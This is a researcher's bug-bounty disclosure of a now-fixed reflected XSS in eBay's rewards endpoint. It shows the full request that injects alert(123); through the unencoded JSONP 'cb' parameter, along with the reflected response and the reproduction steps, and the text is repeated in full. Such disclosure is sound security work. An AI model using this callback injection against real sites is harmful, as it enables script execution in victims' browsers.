I would like to elaborate the reflected XSS finding that I have reported to eBay during the bug bounty program.
While I was playing with the proxy, I focused on the value of the parameter cb (refers to callback) in the request sent to the URLs
http://rewards.ebay.com/ws/eBayISAPI.dll?GetRewardsInfo
http://www.ebay.com/itm/ws/eBayISAPI.dll?ViewItemLite
I noticed that value is returned in the response in a JavaScript context without filtering or encoding in both URLs. Here's a snippet from the request sent to the rewards page with a sample injection alert(123); in the cb parameter
GET /ws/eBayISAPI.dll?GetRewardsInfo&item=121071656603&ShowRewards=true&isBucksNew=true&isInvited=false&baseOffer=2&bucksLink=http://my.ebay.com/ws/eBayISAPI.dll?RewardsIntEnroll&CTASignup=false&ExtLanding=false&ssPageName=VI:joinrewards&isEnrolled=false&isClosedVI=false&myebayBucksLink=null&ShowCoupon=false&IsBidFlow=true&ShowBML=true&IsViewItem=true&item=121071656603&cb=alert(123);jQuery1707709477525318212_1361715451002 HTTP/1.1
Host: rewards.ebay.com
The injected value returned in a JavaScript response without filtering or encoding as shown below
alert(123);jQuery1707709477525318212_1361715451002({"couponLinkMsg":null,"nectarOverlayContent":null,"css":"span.offer-bmlcnt>span{font-family:Verdana;font-size:10px;color:#666}.....
No tags are needed in the injected string because the context of the response is already JavaScript.
For a proof of concept: I did the following steps:
1- Navigated to www.ebay.com
2- Searched for an item
3- Clicked on one of the resulting items
4- Used a proxy to tamper the parameter “cb” while calling http://rewards.ebay.com/ws/eBayISAPI.dll?GetRewardsInfo
5- The script got executed as shown below:
eBay fixed the issue and added my name to their hall of fame list over http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html
Bug bounty program rules for eBay is available on http://pages.ebay.com/securitycenter/Researchers.html
While I was playing with the proxy, I focused on the value of the parameter cb (refers to callback) in the request sent to the URLs
http://rewards.ebay.com/ws/eBayISAPI.dll?GetRewardsInfo
http://www.ebay.com/itm/ws/eBayISAPI.dll?ViewItemLite
I noticed that value is returned in the response in a JavaScript context without filtering or encoding in both URLs. Here's a snippet from the request sent to the rewards page with a sample injection alert(123); in the cb parameter
GET /ws/eBayISAPI.dll?GetRewardsInfo&item=121071656603&ShowRewards=true&isBucksNew=true&isInvited=false&baseOffer=2&bucksLink=http://my.ebay.com/ws/eBayISAPI.dll?RewardsIntEnroll&CTASignup=false&ExtLanding=false&ssPageName=VI:joinrewards&isEnrolled=false&isClosedVI=false&myebayBucksLink=null&ShowCoupon=false&IsBidFlow=true&ShowBML=true&IsViewItem=true&item=121071656603&cb=alert(123);jQuery1707709477525318212_1361715451002 HTTP/1.1
Host: rewards.ebay.com
The injected value returned in a JavaScript response without filtering or encoding as shown below
alert(123);jQuery1707709477525318212_1361715451002({"couponLinkMsg":null,"nectarOverlayContent":null,"css":"span.offer-bmlcnt>span{font-family:Verdana;font-size:10px;color:#666}.....
No tags are needed in the injected string because the context of the response is already JavaScript.
For a proof of concept: I did the following steps:
1- Navigated to www.ebay.com
2- Searched for an item
3- Clicked on one of the resulting items
4- Used a proxy to tamper the parameter “cb” while calling http://rewards.ebay.com/ws/eBayISAPI.dll?GetRewardsInfo
5- The script got executed as shown below:
eBay fixed the issue and added my name to their hall of fame list over http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html
Bug bounty program rules for eBay is available on http://pages.ebay.com/securitycenter/Researchers.html